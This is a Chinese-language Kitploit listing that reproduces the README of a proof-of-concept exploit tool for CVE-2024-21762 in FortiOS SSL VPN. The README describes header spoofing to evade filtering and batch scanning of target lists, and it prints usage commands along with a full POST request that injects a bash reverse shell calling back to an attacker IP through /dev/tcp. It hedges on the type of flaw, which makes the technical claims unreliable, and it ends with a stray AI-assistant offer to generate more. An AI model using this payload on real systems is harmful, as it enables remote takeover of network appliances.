Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

针对FortiOS SSL VPN的/remote/hostcheck_validate端点的CVE-2024-21762概念验证扫描器,带有反弹shell载荷投递功能。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
2121年前尚未审核

CVE-2024-21762_FortiNet_PoC

针对 FortiOS SSL VPN 的 /remote/hostcheck_validate 端点中 CVE-2024-21762 的概念验证扫描器,支持反向 shell 载荷投递。


以下是为你的项目编写的 GitHub 风格文案,包含简洁明了的摘要、使用指南以及该工具与 CVE 关联的背景说明。


🔥 项目标题:CVE-2024-21762 FortiOS HostCheck PoC 扫描器

🧠 摘要(用于 GitHub 描述行):

针对 FortiOS SSL VPN 的 /remote/hostcheck_validate 端点中 CVE-2024-21762 的概念验证扫描器,支持反向 shell 载荷投递。


📜 概述

此 Python 脚本是一个概念验证 (PoC) 工具,旨在与 Fortinet 的 FortiOS SSL VPN 界面交互,针对 CVE-2024-21762 —— //remote/hostcheck_validate 端点中的栈缓冲区溢出或命令注入漏洞。

免责声明:仅供教育和授权测试用途。


🧬 工作原理

  • 向 FortiGate SSL VPN 界面的 /remote/hostcheck_validate 发送精心构造的 POST 请求。
  • 在模拟的易受攻击参数(host)中注入 bash 反向 shell 载荷。
  • 使用伪造的头部(User-Agent、Cookie)绕过浅层 FortiOS 请求过滤。
  • 接收并记录服务器响应,以评估利用是否成功。
  • 支持 单个 或 批量 目标测试,具备文件输入/输出自动化和进度条。

🛠️ 功能特性

  • 🧪 通过受控表单字段注入反向 shell 载荷
  • 🧾 完整 HTTP 响应捕获与分析(last_response.txt)
  • 📊 单/批量模式下的进度条跟踪
  • 🗃️ 批量模式支持输入/输出文件
  • 🔄 模块化且可扩展

⚙️ 依赖要求

  • Python 3.6+
  • tqdm 用于进度显示

安装依赖:

root@kitploit:~
pip install tqdm

🚀 使用方法

单个目标模式

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

批量模式

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt:目标列表,每行一个 IP:PORT 格式
  • results.txt:利用尝试的输出日志

📥 发送的载荷示例

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 日志

该工具会将每次尝试的完整 HTTP 响应写入:

root@kitploit:~
last_response.txt

可用于验证请求是否被解析、拒绝,或是否返回错误代码。


⚠️ 法律声明

本代码 仅供教育和授权测试用途。请勿在您不拥有或未经明确许可的系统或网络上使用。


✍️ 作者

Carter —— 网络安全工程师,红/紫队爱好者,PoC 自动化达人。


是否需要将其打包成 README.md 文件 + 仓库结构,以便推送至 GitHub?我可以下一步生成。

下载工具